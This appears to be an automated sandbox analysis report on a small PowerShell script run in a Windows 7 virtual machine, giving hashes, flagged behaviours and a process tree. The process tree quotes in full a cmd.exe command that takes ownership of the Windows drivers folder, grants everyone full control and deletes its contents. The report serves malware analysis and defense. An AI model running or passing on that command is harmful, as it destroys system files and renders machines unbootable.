Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
13-08-2024 20:53
Static task
static1
Behavioral task
behavioral1
Sample
script.ps1
Resource
win7-20240704-en
General
-
Target
script.ps1
-
Size
373B
-
MD5
138825370aacd69bec42b835e992d4e8
-
SHA1
e7ca9d34065b73a700b5e8a5ae568da4f5d54bff
-
SHA256
cc378cee3365c7a74a92c524e37ba3abfa2638b0365a20fcfe78d77a7a172731
-
SHA512
93535adb74134f3d4f3a95a4585f10e19ddb800ffacd7044c676b4f74a6631254d15ee65fc1de11f83ab842397b22e2b2492ab7ecd3a5a106ff7f272b2c906ee
Malware Config
Signatures
-
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 2768 takeown.exe 2716 icacls.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 2768 takeown.exe 2716 icacls.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 2864 powershell.exe 2888 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exetakeown.exepowershell.exedescription pid process Token: SeDebugPrivilege 2864 powershell.exe Token: SeTakeOwnershipPrivilege 2768 takeown.exe Token: SeDebugPrivilege 2888 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
powershell.execmd.exedescription pid process target process PID 2864 wrote to memory of 2860 2864 powershell.exe cmd.exe PID 2864 wrote to memory of 2860 2864 powershell.exe cmd.exe PID 2864 wrote to memory of 2860 2864 powershell.exe cmd.exe PID 2860 wrote to memory of 2768 2860 cmd.exe takeown.exe PID 2860 wrote to memory of 2768 2860 cmd.exe takeown.exe PID 2860 wrote to memory of 2768 2860 cmd.exe takeown.exe PID 2860 wrote to memory of 2716 2860 cmd.exe icacls.exe PID 2860 wrote to memory of 2716 2860 cmd.exe icacls.exe PID 2860 wrote to memory of 2716 2860 cmd.exe icacls.exe PID 2860 wrote to memory of 2888 2860 cmd.exe powershell.exe PID 2860 wrote to memory of 2888 2860 cmd.exe powershell.exe PID 2860 wrote to memory of 2888 2860 cmd.exe powershell.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\drivers\* >nul && icacls C:\Windows\System32\drivers\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\drivers\* >nul 2>&1 && powershell"2⤵
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\* /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2888
-
-
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T1⤵PID:2052
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53462f782ab8c74b75711d783319ada24
SHA165622f214bef2cec0dcdec8bf1026899be381eba
SHA25676ac902daddda6f5d95432723720c94b455f8fb43aa7eee0f7bc62e01a1e15d3
SHA512c483db648918e7b19a83fc2a2d34765b23ac0eaa6a8b0cef1573c3cafaf7b0702652df5401a2a5b6c29679478a48f952353f0a3467dc55ef86f34affe8e257fa